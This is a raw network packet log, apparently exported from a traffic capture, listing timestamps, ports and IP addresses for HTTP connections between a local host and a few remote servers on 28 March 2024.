Mar 28, 2024 09:14:59.378350973 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.378354073 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.378388882 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.378388882 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.378403902 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.378427029 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.378459930 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.378462076 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.378462076 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.378518105 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.378539085 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.378580093 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.378874063 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.378906965 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.378940105 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.378940105 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.378971100 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.378993034 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.379024982 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.379031897 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.379031897 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.379059076 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.379071951 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.379090071 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.379090071 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.379127979 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.379946947 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.379966974 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.379980087 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.380045891 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.380045891 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.380054951 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.380099058 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.380135059 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.380166054 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.380173922 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.380173922 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.380208015 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.380734921 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.380767107 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.380795956 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.380804062 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.380804062 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.380809069 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.380830050 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.380861044 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.381139040 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.381175041 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.381223917 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.381234884 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.381267071 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.381268024 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.381279945 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.381302118 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.381320000 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.381320000 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.381334066 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.381365061 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.381365061 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.382185936 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.382201910 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.382297039 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.382306099 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.382333994 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.382348061 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.382361889 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.382366896 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.382375956 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.382385015 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.382417917 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.382425070 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.383230925 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.383255005 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.383270979 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.383284092 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.383299112 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.383312941 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.383328915 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.383347034 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.383347034 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.383372068 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.383385897 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.383991003 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.384068966 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.384103060 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.384114027 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.384130001 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.384133101 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.384161949 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.384162903 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.384195089 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.384229898 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.384229898 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.384269953 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.384344101 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.384857893 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.384916067 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.384957075 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.384999990 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.385013103 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.385013103 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.385035992 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.385047913 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.385107040 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.385159969 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.385196924 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.385196924 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.385207891 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.385328054 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.385847092 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.385984898 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.385999918 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.386034012 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.386056900 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.386140108 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.386146069 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.386221886 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.386298895 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.386300087 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.386392117 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.386739969 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.386758089 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.386805058 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.386805058 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.386823893 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.386843920 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.386857033 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.386873960 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.386900902 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.386907101 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.386907101 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.386931896 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.387691975 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.387800932 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.387839079 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.387868881 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.387896061 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.387900114 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.387918949 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.387953043 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.387967110 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.387968063 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.388008118 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.388008118 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.388011932 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.388051033 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.388066053 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.388104916 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.388130903 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.388736963 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.388787031 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.388803005 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.388817072 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.388818979 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.388834953 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.388844967 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.388844967 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.388869047 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.388869047 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.388885021 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.388895035 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.388921976 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.388921976 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.389677048 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.389708996 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.389739037 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.389789104 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.389789104 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.389791012 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.389830112 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.389856100 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.389863968 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.389863968 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.389895916 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.389929056 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.389929056 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.390647888 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.390666962 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.390685081 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.390697956 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.390707970 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.390712976 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.390728951 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.390742064 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.390758038 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.390758038 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.391037941 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.391547918 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.391575098 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.391596079 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.391645908 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.391645908 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.391659975 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.391676903 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.391690016 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.391702890 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.391742945 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.391742945 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.393249035 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.393269062 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.393281937 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.393296957 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.393310070 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.393326044 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.393347025 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.393358946 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.393358946 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.393395901 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.393397093 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.393410921 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.393449068 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.393472910 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.393479109 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.393486023 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.393486023 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.393501997 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.393553972 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.393568039 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.393583059 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.393598080 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.393611908 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.393620968 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.393620968 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.393640041 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.393666029 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.393666029 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.393685102 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.394397974 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.394412041 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.394438028 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.394453049 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.394462109 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.394485950 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.394517899 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.394534111 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.394547939 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.394561052 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.394584894 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.394609928 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.395301104 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.395323038 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.395335913 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.395364046 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.395387888 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.395415068 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.395421982 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.395435095 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.395435095 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.395483017 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.395483017 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.396260977 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.396320105 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.396333933 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.396389961 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.396389961 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.396389008 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.396413088 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.396461964 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.396476030 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.396498919 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.396498919 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.396555901 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.397167921 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.397290945 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.397314072 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.397319078 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.397361040 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.397373915 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.397373915 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.397407055 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.397420883 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.397439957 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.397474051 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.397505999 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.397507906 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.397547007 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.397547007 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.398293972 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.398329020 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.398361921 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.398396969 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.398400068 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.398400068 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.398432016 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.398443937 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.398471117 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.398495913 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.398505926 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.398530960 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.398571968 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.399468899 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.399487972 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.399518967 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.399555922 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.399564028 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.399564028 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.399604082 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.399637938 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.399652958 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.399653912 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.399653912 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.399696112 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.399696112 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.400109053 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.400140047 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.400192022 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.400209904 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.400233984 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.400262117 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.400285959 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.400286913 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.400293112 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.400331020 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.400331020 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.400369883 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.400369883 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.400836945 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:14:59.400922060 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:14:59.401086092 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.401101112 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.401120901 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:14:59.401124001 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.401155949 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.401155949 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.401199102 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.401215076 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.401228905 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.401241064 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.401267052 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.401298046 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.401298046 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.401956081 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.401972055 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.402023077 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.402060032 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.402093887 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.402122021 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.402127981 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.402137041 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.402153015 CET	49743	80	192.168.2.4	104.21.22.54
